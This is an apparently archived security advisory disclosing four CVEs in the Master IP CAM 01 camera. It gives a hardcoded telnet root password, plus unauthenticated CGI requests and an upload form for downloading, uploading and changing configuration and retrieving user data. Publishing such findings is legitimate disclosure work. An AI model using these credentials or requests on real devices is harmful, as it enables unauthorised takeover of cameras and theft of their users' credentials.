Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Master IP CAM 01 Hardcoded Password / Unauthenticated Access: Posted Jan 17, 2018; Authored by Daniele Linguaglossa, Raffaele Sabato; Master IP CAM version 01 has a hardcoded root password and suffers from multiple unauthenticated access vulnerabilities.; tags | exploit, root, vulnerability, bypass; advisories | CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726; SHA-256 | 1b7b16dc033365ff3162c79dfd711a78130a165f689c53737f95802789f1b521; Download | Favorite | View

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
# Date: 17-01-2018
# Remote: Yes
# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
 
I DESCRIPTION
========================================================================
The Master IP CAM 01 suffers of multiple vulnerabilities:
 
# [CVE-2018-5723] Hardcoded Password for Root Account
# [CVE-2018-5724] Unauthenticated Configuration Download and Upload
# [CVE-2018-5725] Unauthenticated Configuration Change
# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
 
 
II PROOF OF CONCEPT
========================================================================
 
## [CVE-2018-5723] Hardcoded Password for Root Account
 
Is possible to access telnet with the hardcoded credential root:cat1029
 
 
## [CVE-2018-5724] Unauthenticated Configuration Download and Upload
 
Download:
 
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
 
Upload Form:
 
### Unauthenticated Configuration Upload
<form name="form6" method="post" enctype="multipart/form-data"
action="cgi-bin/hi3510/restore.cgi" >
<input type="file" name="setting_file" >
<input type="submit" value="restore" >
</form>
 
 
## [CVE-2018-5725] Unauthenticated Configuration Change
 
Change configuration:
 
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
 
List of available commands here:
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
 
 
## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
 
Retrieve sensitive information:
 
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
 
 
III REFERENCES
========================================================================
http://syrion.me/blog/master-ipcam/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

Top Authors In Last 30 Days

Red Hat 185 files
Ubuntu 89 files
Gentoo 23 files
Debian 20 files
tmrswrr 8 files
Amit Roy 4 files
Aslam Anwar Mahimkar 3 files
Jann Horn 3 files
ron190 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,074)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,523)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,242)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,193)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,636)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Share This

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems